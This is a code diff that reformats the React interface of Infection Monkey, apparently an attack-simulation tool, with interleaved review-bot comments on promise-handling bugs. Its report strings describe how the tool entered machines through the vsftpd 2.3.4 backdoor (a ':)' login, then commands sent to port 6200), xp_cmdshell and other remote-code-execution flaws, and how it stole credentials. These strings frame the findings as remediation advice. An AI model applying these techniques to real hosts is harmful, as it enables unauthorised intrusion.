diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index 43dac797c..9b9be2340 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js @@ -3,7 +3,7 @@ import Form from 'react-jsonschema-form'; import {Col, Modal, Nav, NavItem} from 'react-bootstrap'; import fileDownload from 'js-file-download'; import AuthComponent from '../AuthComponent'; -import { FilePond } from 'react-filepond'; +import {FilePond} from 'react-filepond'; import 'filepond/dist/filepond.min.css'; import MatrixComponent from "../attack/MatrixComponent"; @@ -37,7 +37,7 @@ class ConfigurePageComponent extends AuthComponent { }; } - getUiSchemas(){ + getUiSchemas() { return ({ basic: {"ui:order": ["general", "credentials"]}, basic_network: {}, @@ -94,8 +94,11 @@ class ConfigurePageComponent extends AuthComponent { this.setInitialConfig(monkeyConfig.configuration); this.setInitialAttackConfig(attackConfig.configuration); for (let sectionKey of this.sectionsOrder) { - if (sectionKey === 'attack') {sections.push({key:sectionKey, title: "ATT&CK"})} - else {sections.push({key: sectionKey, title: monkeyConfig.schema.properties[sectionKey].title});} + if (sectionKey === 'attack') { + sections.push({key: sectionKey, title: "ATT&CK"}) + } else { + sections.push({key: sectionKey, title: monkeyConfig.schema.properties[sectionKey].title}); + } } this.setState({ schema: monkeyConfig.schema, 
@@ -110,15 +113,15 @@ class ConfigurePageComponent extends AuthComponent { updateConfig = () => { this.authFetch(CONFIG_URL) - .then(res => res.json()) - .then(data => { - this.setInitialConfig(data.configuration); - this.setState({configuration: data.configuration}) - }) + .then(res => res.json()) + .then(data => { + this.setInitialConfig(data.configuration); + this.setState({configuration: data.configuration}) + }) }; onSubmit = () => { - if (this.state.selectedSection === 'attack'){ + if (this.state.selectedSection === 'attack') { this.matrixSubmit() } else { this.configSubmit() @@ -134,13 +137,14 @@ class ConfigurePageComponent extends AuthComponent { body: JSON.stringify(this.state.attackConfig) }) .then(res => { - if (!res.ok) - { + if (!res.ok) { throw Error() } return res; }) - .then(() => {this.setInitialAttackConfig(this.state.attackConfig);}) + .then(() => { + this.setInitialAttackConfig(this.state.attackConfig); + }) .then(this.updateConfig()) .then(this.setState({lastAction: 'saved'})) .catch(error => { 
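Review bot: In the `matrixSubmit` hunk the reformatted chain still ends with `.then(this.updateConfig())` and `.then(this.setState({lastAction: 'saved'}))`, which invoke `updateConfig()` and `setState()` synchronously while the chain is being built rather than after the POST resolves, so `lastAction` reads 'saved' before the island has answered and stays 'saved' even when `!res.ok` throws into the `.catch`. Wrap both in callbacks: `.then(() => this.updateConfig())` and `.then(() => this.setState({lastAction: 'saved'}))`. `matrixSubmit` begins, and its `.catch` body ends, outside this hunk.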
@@ -162,28 +166,28 @@ class ConfigurePageComponent extends AuthComponent { this.setInitialConfig(res.configuration); this.props.onStatusChange(); }).catch(error => { - console.log('bad configuration'); - this.setState({lastAction: 'invalid_configuration'}); - }); + console.log('bad configuration'); + this.setState({lastAction: 'invalid_configuration'}); + }); }; // Alters attack configuration when user toggles technique - attackTechniqueChange = (technique, value, mapped=false) => { + attackTechniqueChange = (technique, value, mapped = false) => { // Change value in attack configuration // Go trough each column in matrix, searching for technique Object.entries(this.state.attackConfig).forEach(techType => { - if(techType[1].properties.hasOwnProperty(technique)){ + if (techType[1].properties.hasOwnProperty(technique)) { let tempMatrix = this.state.attackConfig; tempMatrix[techType[0]].properties[technique].value = value; this.setState({attackConfig: tempMatrix}); // Toggle all mapped techniques - if (! mapped ){ + if (!mapped) { // Loop trough each column and each row Object.entries(this.state.attackConfig).forEach(otherType => { Object.entries(otherType[1].properties).forEach(otherTech => { // If this technique depends on a technique that was changed - if (otherTech[1].hasOwnProperty('depends_on') && otherTech[1]['depends_on'].includes(technique)){ + if (otherTech[1].hasOwnProperty('depends_on') && otherTech[1]['depends_on'].includes(technique)) { this.attackTechniqueChange(otherTech[0], value, true) } }) @@ -207,41 +211,47 @@ class ConfigurePageComponent extends AuthComponent { }; renderAttackAlertModal = () => { - return ( {this.setState({showAttackAlert: false})}}> - -

Warning

-

- You have unsubmitted changes. Submit them before proceeding. -

-
- -
-
-
) + return ( { + this.setState({showAttackAlert: false}) + }}> + +

+
Warning
+

+

+ You have unsubmitted changes. Submit them before proceeding. +

+
+ +
+
+
) }; - userChangedConfig(){ - if(JSON.stringify(this.state.configuration) === JSON.stringify(this.initialConfig)){ - if(Object.keys(this.currentFormData).length === 0 || - JSON.stringify(this.initialConfig[this.currentSection]) === JSON.stringify(this.currentFormData)){ + userChangedConfig() { + if (JSON.stringify(this.state.configuration) === JSON.stringify(this.initialConfig)) { + if (Object.keys(this.currentFormData).length === 0 || + JSON.stringify(this.initialConfig[this.currentSection]) === JSON.stringify(this.currentFormData)) { return false; } } return true; } - userChangedMatrix(){ + userChangedMatrix() { return (JSON.stringify(this.state.attackConfig) !== JSON.stringify(this.initialAttackConfig)) } setSelectedSection = (key) => { if ((key === 'attack' && this.userChangedConfig()) || - (this.currentSection === 'attack' && this.userChangedMatrix())){ + (this.currentSection === 'attack' && this.userChangedMatrix())) { this.setState({showAttackAlert: true}); return; } @@ -270,9 +280,11 @@ class ConfigurePageComponent extends AuthComponent { this.setInitialConfig(res.configuration); this.props.onStatusChange(); }); - this.authFetch(ATTACK_URL,{ method: 'POST', - headers: {'Content-Type': 'application/json'}, - body: JSON.stringify('reset_attack_matrix')}) + this.authFetch(ATTACK_URL, { + method: 'POST', + headers: {'Content-Type': 'application/json'}, + body: JSON.stringify('reset_attack_matrix') + }) .then(res => res.json()) .then(res => { this.setState({attackConfig: res.configuration}); 
@@ -280,16 +292,18 @@ class ConfigurePageComponent extends AuthComponent { }) }; - removePBAfiles(){ + removePBAfiles() { // We need to clean files from widget, local state and configuration (to sync with bac end) - if (this.PBAwindowsPond !== null){ + if (this.PBAwindowsPond !== null) { this.PBAwindowsPond.removeFile(); } - if (this.PBAlinuxPond !== null){ + if (this.PBAlinuxPond !== null) { this.PBAlinuxPond.removeFile(); } - let request_options = {method: 'DELETE', - headers: {'Content-Type': 'text/plain'}}; + let request_options = { + method: 'DELETE', + headers: {'Content-Type': 'text/plain'} + }; this.authFetch('/api/fileUpload/PBAlinux', request_options); this.authFetch('/api/fileUpload/PBAwindows', request_options); this.setState({PBAlinuxFile: [], PBAwinFile: []}); @@ -300,9 +314,12 @@ class ConfigurePageComponent extends AuthComponent { this.setState({ configuration: JSON.parse(event.target.result), lastAction: 'import_success' - }, () => {this.sendConfig(); this.setInitialConfig(JSON.parse(event.target.result))}); + }, () => { + this.sendConfig(); + this.setInitialConfig(JSON.parse(event.target.result)) + }); this.currentFormData = {}; - } catch(SyntaxError) { + } catch (SyntaxError) { this.setState({lastAction: 'import_failure'}); } }; @@ -315,18 +332,17 @@ class ConfigurePageComponent extends AuthComponent { sendConfig() { return ( this.authFetch('/api/configuration/island', - { - method: 'POST', - headers: {'Content-Type': 'application/json'}, - body: JSON.stringify(this.state.configuration) - }) - .then(res => { - if (!res.ok) { - throw Error() - } - return res; - }).catch(error => { + method: 'POST', + headers: {'Content-Type': 'application/json'}, + body: JSON.stringify(this.state.configuration) + }) + .then(res => { + if (!res.ok) { + throw Error() + } + return res; + }).catch(error => { console.log('bad configuration'); this.setState({lastAction: 'invalid_configuration'}); })); 
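Review bot: In the `removePBAfiles` hunk the two `authFetch(..., request_options)` DELETE calls discard their promises, so a rejected or non-2xx delete is never surfaced, while the following `setState({PBAlinuxFile: [], PBAwinFile: []})` clears the local state unconditionally and the UI then disagrees with what the island still stores. Chain them: `Promise.all([this.authFetch('/api/fileUpload/PBAlinux', request_options), this.authFetch('/api/fileUpload/PBAwindows', request_options)]).then(() => this.setState({PBAlinuxFile: [], PBAwinFile: []}))`, and add a `.catch` that at least logs the failure or records it in `lastAction`. The rest of the method runs past the end of the hunk.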
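Review bot: `catch (SyntaxError)` in the import hunk does not filter on exception type: in JavaScript the parenthesised name is just a binding, so every error thrown inside the `try` (not only a `JSON.parse` failure) is bound to a local called `SyntaxError`, shadowing the global constructor within the block, and reported as 'import_failure'. Rename the binding and branch on the type so unexpected failures are not mislabelled as an invalid config file: `catch (err) { if (!(err instanceof SyntaxError)) { console.error(err); } this.setState({lastAction: 'import_failure'}); }`. Note also that `JSON.parse(event.target.result)` is evaluated twice, once for `configuration` and again inside the `setState` callback; parsing once into a local avoids the duplicate work. The enclosing handler starts outside the hunk.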
@@ -355,12 +371,13 @@ class ConfigurePageComponent extends AuthComponent { PBAwindows = () => { return ( { @@ -374,12 +391,13 @@ class ConfigurePageComponent extends AuthComponent { PBAlinux = () => { return ( { @@ -391,23 +409,23 @@ class ConfigurePageComponent extends AuthComponent { />) }; - getWinPBAfile(){ - if (this.state.PBAwinFile.length !== 0){ + getWinPBAfile() { + if (this.state.PBAwinFile.length !== 0) { return ConfigurePageComponent.getMockPBAfile(this.state.PBAwinFile[0]) - } else if (this.state.configuration.monkey.behaviour.PBA_windows_filename){ + } else if (this.state.configuration.monkey.behaviour.PBA_windows_filename) { return ConfigurePageComponent.getFullPBAfile(this.state.configuration.monkey.behaviour.PBA_windows_filename) } } - getLinuxPBAfile(){ - if (this.state.PBAlinuxFile.length !== 0){ + getLinuxPBAfile() { + if (this.state.PBAlinuxFile.length !== 0) { return ConfigurePageComponent.getMockPBAfile(this.state.PBAlinuxFile[0]) } else if (this.state.configuration.monkey.behaviour.PBA_linux_filename) { return ConfigurePageComponent.getFullPBAfile(this.state.configuration.monkey.behaviour.PBA_linux_filename) } } - static getFullPBAfile(filename){ + static getFullPBAfile(filename) { return [{ source: filename, options: { @@ -416,7 +434,7 @@ class ConfigurePageComponent extends AuthComponent { }]; } - static getMockPBAfile(mockFile){ + static getMockPBAfile(mockFile) { let pbaFile = [{ source: mockFile.name, options: { @@ -437,39 +455,39 @@ class ConfigurePageComponent extends AuthComponent { renderConfigContent = (displayedSchema) => { return (
- {this.renderBasicNetworkWarning()} -
- -
-
) + {this.renderBasicNetworkWarning()} +
+ +
+
) }; renderRunningMonkeysWarning = () => { return (
- { this.state.allMonkeysAreDead ? - '' : -
- - Some monkeys are currently running. Note that changing the configuration will only apply to new - infections. -
- } -
) + {this.state.allMonkeysAreDead ? + '' : +
+ + Some monkeys are currently running. Note that changing the configuration will only apply to new + infections. +
+ } + ) }; renderBasicNetworkWarning = () => { - if (this.state.selectedSection === 'basic_network'){ + if (this.state.selectedSection === 'basic_network') { return (
- - The Monkey scans its subnet if "Local network scan" is ticked. Additionally the monkey scans machines - according to its range class. -
) + + The Monkey scans its subnet if "Local network scan" is ticked. Additionally the monkey scans machines + according to its range class. + ) } else { - return (
) + return (
) } }; @@ -477,8 +495,8 @@ class ConfigurePageComponent extends AuthComponent { return () + {this.state.sections.map(section => {section.title})} + ) }; render() { @@ -488,9 +506,9 @@ class ConfigurePageComponent extends AuthComponent { displayedSchema['definitions'] = this.state.schema['definitions']; } let content = ''; - if (this.state.selectedSection === 'attack' && Object.entries(this.state.attackConfig).length !== 0 ) { + if (this.state.selectedSection === 'attack' && Object.entries(this.state.attackConfig).length !== 0) { content = this.renderMatrix() - } else if(this.state.selectedSection !== 'attack') { + } else if (this.state.selectedSection !== 'attack') { content = this.renderConfigContent(displayedSchema) } return ( @@ -498,8 +516,8 @@ class ConfigurePageComponent extends AuthComponent { {this.renderAttackAlertModal()}

Monkey Configuration

{this.renderNav()} - { this.renderRunningMonkeysWarning()} - { content } + {this.renderRunningMonkeysWarning()} + {content}
- +
- { this.state.lastAction === 'reset' ? + {this.state.lastAction === 'reset' ?
Configuration reset successfully.
: ''} - { this.state.lastAction === 'saved' ? + {this.state.lastAction === 'saved' ?
Configuration saved successfully.
: ''} - { this.state.lastAction === 'import_failure' ? + {this.state.lastAction === 'import_failure' ?
Failed importing configuration. Invalid config file.
: ''} - { this.state.lastAction === 'invalid_configuration' ? + {this.state.lastAction === 'invalid_configuration' ?
An invalid configuration file was imported or submitted.
: ''} - { this.state.lastAction === 'import_success' ? + {this.state.lastAction === 'import_success' ?
Configuration imported successfully. diff --git a/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js b/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js index b7a2ec077..3abd1682c 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js @@ -18,8 +18,8 @@ class LicensePageComponent extends React.Component {

License

- Copyright 2017 Guardicore Ltd. -
+ Copyright 2017 Guardicore Ltd. +
Licensed under GPLv3.

diff --git a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js index 4d074c835..779a3c894 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js @@ -52,7 +52,7 @@ class MapPageComponent extends AuthComponent { }; updateTelemetryFromServer = () => { - this.authFetch('/api/telemetry-feed?timestamp='+this.state.telemetryLastTimestamp) + this.authFetch('/api/telemetry-feed?timestamp=' + this.state.telemetryLastTimestamp) .then(res => res.json()) .then(res => { let newTelem = this.state.telemetry.concat(res['telemetries']); @@ -71,8 +71,7 @@ class MapPageComponent extends AuthComponent { this.authFetch('/api/netmap/node?id=' + event.nodes[0]) .then(res => res.json()) .then(res => this.setState({selected: res, selectedType: 'node'})); - } - else if (event.edges.length === 1) { + } else if (event.edges.length === 1) { let displayedEdge = this.state.graph.edges.find( function (edge) { return edge['id'] === event.edges[0]; @@ -84,8 +83,7 @@ class MapPageComponent extends AuthComponent { .then(res => res.json()) .then(res => this.setState({selected: res.edge, selectedType: 'edge'})); } - } - else { + } else { this.setState({selected: null, selectedType: null}); } } @@ -100,7 +98,9 @@ class MapPageComponent extends AuthComponent { return ( this.setState({showKillDialog: false})}> -

Are you sure you want to kill all monkeys?

+

+
Are you sure you want to kill all monkeys?
+

This might take a few moments...

@@ -153,15 +153,15 @@ class MapPageComponent extends AuthComponent {
Legend: - Exploit + Exploit | - Scan + Scan | - Tunnel + Tunnel | - Island Communication + Island Communication
- { this.renderTelemetryConsole() } + {this.renderTelemetryConsole()}
@@ -174,7 +174,8 @@ class MapPageComponent extends AuthComponent {
Monkey Telemetry - diff --git a/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js b/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js index 20faafca7..66dc7e089 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js @@ -29,15 +29,13 @@ class PassTheHashMapPageComponent extends AuthComponent { return node['id'] === event.nodes[0]; }); this.setState({selected: displayedNode, selectedType: 'node'}) - } - else if (event.edges.length === 1) { + } else if (event.edges.length === 1) { let displayedEdge = this.state.graph.edges.find( function (edge) { return edge['id'] === event.edges[0]; }); - this.setState({selected: displayedEdge, selectedType: 'edge'}); - } - else { + this.setState({selected: displayedEdge, selectedType: 'edge'}); + } else { this.setState({selected: null, selectedType: null}); } } diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js index 68ba84aa6..c3b538c70 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js @@ -135,19 +135,21 @@ class ReportPageComponent extends AuthComponent { } else { content =
- {this.generateReportOverviewSection()} - {this.generateReportFindingsSection()} - {this.generateReportRecommendationsSection()} - {this.generateReportGlanceSection()} - {this.generateAttackSection()} - {this.generateReportFooter()} + {this.generateReportOverviewSection()} + {this.generateReportFindingsSection()} + {this.generateReportRecommendationsSection()} + {this.generateReportGlanceSection()} + {this.generateAttackSection()} + {this.generateReportFooter()}
; } return (
- {print();}} /> + { + print(); + }}/>
@@ -155,7 +157,9 @@ class ReportPageComponent extends AuthComponent { {content}
- {print();}} /> + { + print(); + }}/>
); @@ -269,14 +273,14 @@ class ReportPageComponent extends AuthComponent { return x === true; }).length > 0 ?
- During this simulated attack the Monkey uncovered {this.state.report.overview.issues.filter(function (x) { return x === true; }).length} threats:
    {this.state.report.overview.issues[this.Issue.STOLEN_SSH_KEYS] ? -
  • Stolen SSH keys are used to exploit other machines.
  • : null } +
  • Stolen SSH keys are used to exploit other machines.
  • : null} {this.state.report.overview.issues[this.Issue.STOLEN_CREDS] ?
  • Stolen credentials are used to exploit other machines.
  • : null} {this.state.report.overview.issues[this.Issue.ELASTIC] ? @@ -309,15 +313,16 @@ class ReportPageComponent extends AuthComponent { {this.state.report.overview.issues[this.Issue.STRUTS2] ?
  • Struts2 servers are vulnerable to remote code execution. ( - CVE-2017-5638)
  • : null } + CVE-2017-5638) : null} {this.state.report.overview.issues[this.Issue.WEBLOGIC] ? -
  • Oracle WebLogic servers are susceptible to a remote code execution vulnerability.
  • : null } +
  • Oracle WebLogic servers are susceptible to a remote code execution vulnerability.
  • : null} {this.state.report.overview.issues[this.Issue.HADOOP] ? -
  • Hadoop/Yarn servers are vulnerable to remote code execution.
  • : null } +
  • Hadoop/Yarn servers are vulnerable to remote code execution.
  • : null} {this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ? -
  • Mimikatz found login credentials of a user who has admin access to a server defined as critical.
  • : null } +
  • Mimikatz found login credentials of a user who has admin access to a server defined as + critical.
  • : null} {this.state.report.overview.issues[this.Issue.MSSQL] ? -
  • MS-SQL servers are vulnerable to remote code execution via xp_cmdshell command.
  • : null } +
  • MS-SQL servers are vulnerable to remote code execution via xp_cmdshell command.
  • : null}
: @@ -344,7 +349,8 @@ class ReportPageComponent extends AuthComponent { {this.state.report.overview.warnings[this.Warning.TUNNEL] ?
  • Weak segmentation - Machines were able to communicate over unused ports.
  • : null} {this.state.report.overview.warnings[this.Warning.SHARED_LOCAL_ADMIN] ? -
  • Shared local administrator account - Different machines have the same account as a local administrator.
  • : null} +
  • Shared local administrator account - Different machines have the same account as a local + administrator.
  • : null} {this.state.report.overview.warnings[this.Warning.SHARED_PASSWORDS] ?
  • Multiple users have the same password
  • : null} @@ -355,7 +361,7 @@ class ReportPageComponent extends AuthComponent {
    }
    - { this.state.report.overview.cross_segment_issues.length > 0 ? + {this.state.report.overview.cross_segment_issues.length > 0 ?

    Segmentation Issues @@ -380,14 +386,14 @@ class ReportPageComponent extends AuthComponent { {/* Checks if there are any domain issues. If there are more then one: render the title. Otherwise, * don't render it (since the issues themselves will be empty. */} {Object.keys(this.state.report.recommendations.domain_issues).length !== 0 ? -

    Domain related recommendations

    : null } +

    Domain related recommendations

    : null}
    {this.generateIssues(this.state.report.recommendations.domain_issues)}
    {/* Checks if there are any issues. If there are more then one: render the title. Otherwise, * don't render it (since the issues themselves will be empty. */} {Object.keys(this.state.report.recommendations.issues).length !== 0 ? -

    Machine related recommendations

    : null } +

    Machine related recommendations

    : null}
    {this.generateIssues(this.state.report.recommendations.issues)}
    @@ -444,13 +450,13 @@ class ReportPageComponent extends AuthComponent {
    - {this.generateReportPthMap()} + {this.generateReportPthMap()}
    - +
    ); @@ -463,33 +469,35 @@ class ReportPageComponent extends AuthComponent { Credentials Map

    - This map visualizes possible attack paths through the network using credential compromise. Paths represent lateral movement opportunities by attackers. + This map visualizes possible attack paths through the network using credential compromise. Paths represent lateral + movement opportunities by attackers.

    Legend: - Access credentials | + Access credentials |
    - +
    -
    +
    ); } generateAttackSection() { return (
    -

    - ATT&CK report -

    -

    - This report shows information about ATT&CK techniques used by Infection Monkey. -

    -
    - -
    -
    -
    ) +

    + ATT&CK report +

    +

    + This report shows information about ATT&CK techniques used by Infection Monkey. +

    +
    + +
    +
    +
    ) } generateReportFooter() { @@ -510,22 +518,22 @@ class ReportPageComponent extends AuthComponent { generateCrossSegmentIssue(crossSegmentIssue) { return
  • {'Communication possible from ' + crossSegmentIssue['source_subnet'] + ' to ' + crossSegmentIssue['target_subnet']} - -
      - {crossSegmentIssue['issues'].map(x => - x['is_self'] ? -
    • - {'Machine ' + x['hostname'] + ' has both ips: ' + x['source'] + ' and ' + x['target']} -
    • - : -
    • - {'IP ' + x['source'] + ' (' + x['hostname'] + ') connected to IP ' + x['target'] - + ' using the services: ' + Object.keys(x['services']).join(', ')} -
    • - )} -
    -
    -
  • ; + +
      + {crossSegmentIssue['issues'].map(x => + x['is_self'] ? +
    • + {'Machine ' + x['hostname'] + ' has both ips: ' + x['source'] + ' and ' + x['target']} +
    • + : +
    • + {'IP ' + x['source'] + ' (' + x['hostname'] + ') connected to IP ' + x['target'] + + ' using the services: ' + Object.keys(x['services']).join(', ')} +
    • + )} +
    +
    + ; } generateShellshockPathListBadges(paths) { @@ -619,18 +627,18 @@ class ReportPageComponent extends AuthComponent { generateSshKeysIssue(issue) { return ( -
  • - Protect {issue.ssh_key} private key with a pass phrase. - - The machine {issue.machine} ({issue.ip_address}) is vulnerable to a SSH attack. -
    - The Monkey authenticated over the SSH protocol with private key {issue.ssh_key}. -
    -
  • - ); +
  • + Protect {issue.ssh_key} private key with a pass phrase. + + The machine {issue.machine} ({issue.ip_address}) is vulnerable to a SSH attack. +
    + The Monkey authenticated over the SSH protocol with private key {issue.ssh_key}. +
    +
  • + ); } @@ -660,17 +668,20 @@ class ReportPageComponent extends AuthComponent { Update your VSFTPD server to the latest version vsftpd-3.0.3. The machine {issue.machine} ({issue.ip_address}) has a backdoor running at port {issue.ip_address}) has a backdoor running at port 6200.
    The attack was made possible because the VSFTPD server was not patched against CVE-2011-2523. -

    In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. - Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command shell on port 6200. +

    In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been + compromised. + Users logging into a compromised vsftpd-2.3.4 server may issue a ":)" smileyface as the username and gain a command + shell on port 6200.

    - The Monkey executed commands by first logging in with ":)" in the username and then sending commands to the backdoor at port 6200. + The Monkey executed commands by first logging in with ":)" in the username and then sending commands to the backdoor + at port 6200.

    Read more about the security issue and remediation here. + href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523" + >here.
    ); @@ -716,8 +727,8 @@ class ReportPageComponent extends AuthComponent { Credentials could be stolen from {issue.machine} for the following users {issue.users}. Read more about the security issue and remediation here. + href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/" + >here. ); @@ -756,11 +767,11 @@ class ReportPageComponent extends AuthComponent { generateSharedCredsDomainIssue(issue) { return ( -
  • +
  • Some domain users are sharing passwords, this should be fixed by changing passwords. These users are sharing access password: - {this.generateInfoBadges(issue.shared_with)}. + {this.generateInfoBadges(issue.shared_with)}.
  • ); @@ -768,11 +779,11 @@ class ReportPageComponent extends AuthComponent { generateSharedCredsIssue(issue) { return ( -
  • +
  • Some users are sharing passwords, this should be fixed by changing passwords. These users are sharing access password: - {this.generateInfoBadges(issue.shared_with)}. + {this.generateInfoBadges(issue.shared_with)}.
  • ); @@ -780,8 +791,9 @@ class ReportPageComponent extends AuthComponent { generateSharedLocalAdminsIssue(issue) { return ( -
  • - Make sure the right administrator accounts are managing the right machines, and that there isn’t an unintentional local admin sharing. +
  • + Make sure the right administrator accounts are managing the right machines, and that there isn’t an unintentional local + admin sharing. Here is a list of machines which the account {issue.username} is defined as an administrator: @@ -793,13 +805,13 @@ class ReportPageComponent extends AuthComponent { generateStrongUsersOnCritIssue(issue) { return ( -
  • +
  • This critical machine is open to attacks via strong users with access to it. The services: {this.generateInfoBadges(issue.services)} have been found on the machine thus classifying it as a critical machine. These users has access to it: - {this.generateInfoBadges(issue.threatening_users)}. + {this.generateInfoBadges(issue.threatening_users)}.
  • ); @@ -829,8 +841,8 @@ class ReportPageComponent extends AuthComponent {
    The attack was made possible because the server is using an old version of Jakarta based file upload Multipart parser. For possible work-arounds and more info read here. + href="https://cwiki.apache.org/confluence/display/WW/S2-045" + >here. ); @@ -856,7 +868,8 @@ class ReportPageComponent extends AuthComponent { generateHadoopIssue(issue) { return (
  • - Run Hadoop in secure mode ( + Run Hadoop in secure mode ( add Kerberos authentication). The Hadoop server at {issue.machine} ( Disable the xp_cmdshell option. @@ -880,8 +893,8 @@ generateMSSQLIssue(issue) {
    The attack was made possible because the target machine used an outdated MSSQL server configuration allowing the usage of the xp_cmdshell command. To learn more about how to disable this feature, read - Microsoft's documentation. + href="https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-2017"> + Microsoft's documentation.
  • ); diff --git a/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js b/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js index 1008199fc..57373b2f7 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/RunMonkeyPage.js @@ -1,5 +1,5 @@ import React from 'react'; -import { css } from '@emotion/core'; +import {css} from '@emotion/core'; import {Button, Col, Well, Nav, NavItem, Collapse} from 'react-bootstrap'; import CopyToClipboard from 'react-copy-to-clipboard'; import GridLoader from 'react-spinners/GridLoader'; @@ -35,7 +35,7 @@ class RunMonkeyPageComponent extends AuthComponent { isLoadingAws: true, isErrorWhileCollectingAwsMachines: false, awsMachineCollectionErrorMsg: '' - }; + }; } componentDidMount() { @@ -48,7 +48,7 @@ class RunMonkeyPageComponent extends AuthComponent { this.authFetch('/api/local-monkey') .then(res => res.json()) - .then(res =>{ + .then(res => { if (res['is_running']) { this.setState({runningOnIslandState: 'running'}); } else { @@ -75,7 +75,7 @@ class RunMonkeyPageComponent extends AuthComponent { fetchAwsInfo() { return this.authFetch('/api/remote-monkey?action=list_aws') .then(res => res.json()) - .then(res =>{ + .then(res => { let is_aws = res['is_aws']; if (is_aws) { // On AWS! 
@@ -83,7 +83,12 @@ class RunMonkeyPageComponent extends AuthComponent { let is_error_while_collecting_aws_machines = (res['error'] != null); if (is_error_while_collecting_aws_machines) { // There was an error. Finish loading, and display error message. - this.setState({isOnAws: true, isErrorWhileCollectingAwsMachines: true, awsMachineCollectionErrorMsg: res['error'], isLoadingAws: false}); + this.setState({ + isOnAws: true, + isErrorWhileCollectingAwsMachines: true, + awsMachineCollectionErrorMsg: res['error'], + isLoadingAws: false + }); } else { // No error! Finish loading and display machines for user this.setState({isOnAws: true, awsMachines: res['instances'], isLoadingAws: false}); @@ -138,7 +143,7 @@ class RunMonkeyPageComponent extends AuthComponent { cmdText = RunMonkeyPageComponent.generateWindowsCmd(this.state.selectedIp, is32Bit); } return ( - +
    ) } + render() { return ( @@ -281,9 +291,9 @@ class RunMonkeyPageComponent extends AuthComponent { { // TODO: implement button functionality @@ -302,7 +312,8 @@ class RunMonkeyPageComponent extends AuthComponent { OR

    -

    @@ -323,7 +334,7 @@ class RunMonkeyPageComponent extends AuthComponent { style={{'marginBottom': '2em'}}> {this.state.ips.map(ip => {ip})} - :
    + :
    }

    Copy the following command to your machine and run it with Administrator or root privileges. @@ -344,7 +355,7 @@ class RunMonkeyPageComponent extends AuthComponent { />

    - : null + : null } { this.state.isOnAws ? @@ -357,7 +368,8 @@ class RunMonkeyPageComponent extends AuthComponent { { this.state.isOnAws ?

    -

    @@ -370,9 +382,12 @@ class RunMonkeyPageComponent extends AuthComponent {

    - Error while collecting AWS machine data. Error message: {this.state.awsMachineCollectionErrorMsg}
    + Error while collecting AWS machine data. Error + message: {this.state.awsMachineCollectionErrorMsg}
    Are you sure you've set the correct role on your Island AWS machine?
    - Not sure what this is? Read the documentation! + Not sure what this is? Read + the documentation!

    : diff --git a/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js b/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js index c44a5a72f..eca159133 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/StartOverPage.js @@ -29,7 +29,9 @@ class StartOverPageComponent extends AuthComponent { return ( this.setState({showCleanDialog: false})}> -

    Reset environment

    +

    +
    Reset environment
    +

    Are you sure you want to reset the environment?

    @@ -40,7 +42,7 @@ class StartOverPageComponent extends AuthComponent { Some monkeys are still running. It's advised to kill all monkeys before resetting.
    : -
    +
    }
    @@ -86,7 +89,7 @@ class StartOverPageComponent extends AuthComponent { You can continue and Run More Monkeys as you wish, and see the results on the Infection Map without deleting anything.
    - { this.state.cleaned ? + {this.state.cleaned ?
    Environment was reset successfully @@ -106,8 +109,8 @@ class StartOverPageComponent extends AuthComponent { .then(res => { if (res['status'] === 'OK') { this.setState({ - cleaned: true - }); + cleaned: true + }); } }); } diff --git a/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js b/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js index 120344eea..27fb50cd0 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/TelemetryPage.js @@ -5,14 +5,14 @@ import {DataTable} from 'react-data-components'; import AuthComponent from '../AuthComponent'; import download from 'downloadjs' -const renderJson = (val) => ; +const renderJson = (val) => ; const renderTime = (val) => val.split('.')[0]; const columns = [ - { title: 'Time', prop: 'timestamp', render: renderTime}, - { title: 'Monkey', prop: 'monkey'}, - { title: 'Type', prop: 'telem_catagory'}, - { title: 'Details', prop: 'data', render: renderJson, width: '40%' } + {title: 'Time', prop: 'timestamp', render: renderTime}, + {title: 'Monkey', prop: 'monkey'}, + {title: 'Type', prop: 'telem_catagory'}, + {title: 'Details', prop: 'data', render: renderJson, width: '40%'} ]; class TelemetryPageComponent extends AuthComponent { 